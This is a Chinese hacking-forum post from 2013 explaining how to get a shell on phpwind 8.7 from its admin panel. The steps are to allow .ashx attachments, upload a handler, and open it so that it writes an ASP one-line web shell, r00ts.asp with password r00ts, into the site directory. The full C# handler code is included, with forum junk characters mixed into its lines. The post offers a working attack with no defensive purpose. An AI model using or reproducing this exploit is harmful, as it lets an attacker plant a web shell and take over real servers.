找回密码
 立即注册
查看: 3348|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小0 a9 J; c6 x* T# o

: l7 D# J9 {6 ]3 @$ n群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
0 G! A8 Q8 i1 j0 y   v6 _# A( A6 M+ \
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
2 n+ C+ [3 c) K8 a8 \2 r' g6 D ) {7 o* r# C; `% {3 T) |/ M
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
+ r) M  }/ C4 z3 @
) j+ Z/ d: _  U打开之后空白 会在目录底下生成r00ts.asp 密码r00ts  q+ h4 b4 z! J0 Z( G
* ^5 v2 F. H8 U6 _( H
下面是代码:: e: n  d0 n5 b

, ^/ V* c* C# m; B' w  N<%@ WebHandler Language="C#"Class="Handler" %>
7 J0 e/ }, R) {# {* g& Uusing System;" D0 P3 l7 k# z: ~3 y! n
using System.Web;2 a, l5 |8 {8 h3 }
using System.IO;1 \! X( S* G7 Y! I. Y
public class Handler : IHttpHandler {
3 c& g! a. n, ^6 npublic void ProcessRequest (HttpContext context) {$ E! j. n/ P+ `1 g# u' K  V
context.Response.ContentType = "text/plain";% m( ^4 X  m9 b6 T# z7 X
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
7 c; D' K, T' N; S! G; cfile1.Write("<%eval request(\"r00ts\")%>");: w0 V1 f! \( w( |/ S
file1.Flush();
& G, g+ y* m$ J% q* f: k  p6 I' Wfile1.Close();
" ]6 K- _; y( t8 N0 E- M}
1 C* z/ e5 F$ b7 O6 _9 u  npublic bool IsReusable {
( D, J; M. q3 M% G" M0 H: Wget {$ d- t, {! \/ Q& l
return false;1 o' |& s) y# u
}# ]0 y/ h/ J  v# u2 `) x# R; y
}1 F+ S  n$ H1 w, _
}; ?5 o1 y! q4 `1 \7 s& M  `  a; u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表